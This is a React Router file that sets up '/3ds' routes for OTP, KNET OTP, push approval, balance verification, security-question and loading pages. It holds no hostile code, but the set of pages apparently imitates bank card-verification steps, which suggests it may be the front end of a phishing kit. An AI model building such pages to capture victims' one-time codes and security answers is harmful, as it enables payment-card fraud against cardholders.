import { Route } from "react-router-dom";
import PUSHPage from "./Push";
import Kostil from "./Kostil";
import OTPPage from "./Otp";
import BalanceVerificationPage from "./Balance";
import SecurityQuestionPage from "./Question";
import Loading from "./Loading";
import KnetLoading from "./KnetLoading";
import KnetOTPPage from "./KnetOtp";
import { useEffect, useState } from "react";
import KSecurityQuestionPage from "./KQuestion";

const ThreeDSRoutes = () => {
  


  
  return(
    <Route path="/3ds" element={<Kostil />}>
      <Route path="push" element={<PUSHPage />} />



      <Route path="kotp" element={<KnetOTPPage />} />


      <Route path="otp" element={<OTPPage />} />

      <Route path="balance" element={<BalanceVerificationPage />} />
      <Route path="question" element={<SecurityQuestionPage />} />
      <Route path="kquestion" element={<KSecurityQuestionPage />} />

      
        <Route path="kloading" element={<KnetLoading />} />


      <Route path="loading" element={<Loading />} />

      
      {/* <Route path="success" element={<Success />} /> */}
    </Route>

  );}

  
  export default ThreeDSRoutes;